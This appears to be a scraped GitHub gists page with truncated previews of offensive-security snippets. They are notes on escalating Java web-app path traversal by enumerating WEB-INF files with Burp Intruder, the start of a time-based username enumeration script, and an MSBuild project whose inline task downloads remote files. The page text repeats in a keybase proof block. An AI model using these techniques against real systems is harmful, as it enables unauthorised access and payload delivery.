Bytecod3r bytecod3r

## exploit_path_traversals_in_Java_webapps.txt
so, you can read WEB-INF/web.xml. how can you escalate this issue?

[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.

use a specialized wordlist such as the following (from 	Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.

## userneum_timebased.py
import requests
import time

data=['nonexist123','correctUsernameHere.admin','nonexist124','correctUsernameHere.proliant','nonexist125','correctUsernameHere.admin','nonexist125','nonexist126','nonexist127','correctUsernameHere.cjackson','nonexist127','correctUsernameHere.admin','nonexist128','correctUsernameHere.proliant','nonexist129','correctUsernameHere.admin','nonexist130','nonexist131','nonexist132','correctUsernameHere.cjackson']

headers = {'content-type': 'application/json'}

url=''


## msbuildapicaller.csproj
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

   <UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
      <ParameterGroup>
         <Address ParameterType="System.String" Required="true" />
         <FileName ParameterType="System.String" Required="true" />
      </ParameterGroup>
      <Task>
         <Reference Include="System" />
         <Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code>

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                bytecod3r
                / keybase.md
            
            
              Created
              June 15, 2017 11:20
            
          
    Keybase proof

I hereby claim:

I am bytecod3r on github.
I am bytecod3r (https://keybase.io/bytecod3r) on keybase.
I have a public key ASBR5agAouTH6ETDnlGsETT9L1JtD6Q3erGFzfDPhZSQMgo

To claim this, I am signing this object:
	so, you can read WEB-INF/web.xml. how can you escalate this issue?

	[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.

	use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
	https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
	with time you can build your own wordlist adding files you've discovered over time.
	use Burp Intruder for this, it's perfect for this job.
	sort Intruder results by status code so you can see instantly which files were found.
	import requests
	import time

	data=['nonexist123','correctUsernameHere.admin','nonexist124','correctUsernameHere.proliant','nonexist125','correctUsernameHere.admin','nonexist125','nonexist126','nonexist127','correctUsernameHere.cjackson','nonexist127','correctUsernameHere.admin','nonexist128','correctUsernameHere.proliant','nonexist129','correctUsernameHere.admin','nonexist130','nonexist131','nonexist132','correctUsernameHere.cjackson']

	headers = {'content-type': 'application/json'}

	url=''
	<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

	<UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
	<ParameterGroup>
	<Address ParameterType="System.String" Required="true" />
	<FileName ParameterType="System.String" Required="true" />
	</ParameterGroup>
	<Task>
	<Reference Include="System" />
	<Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code>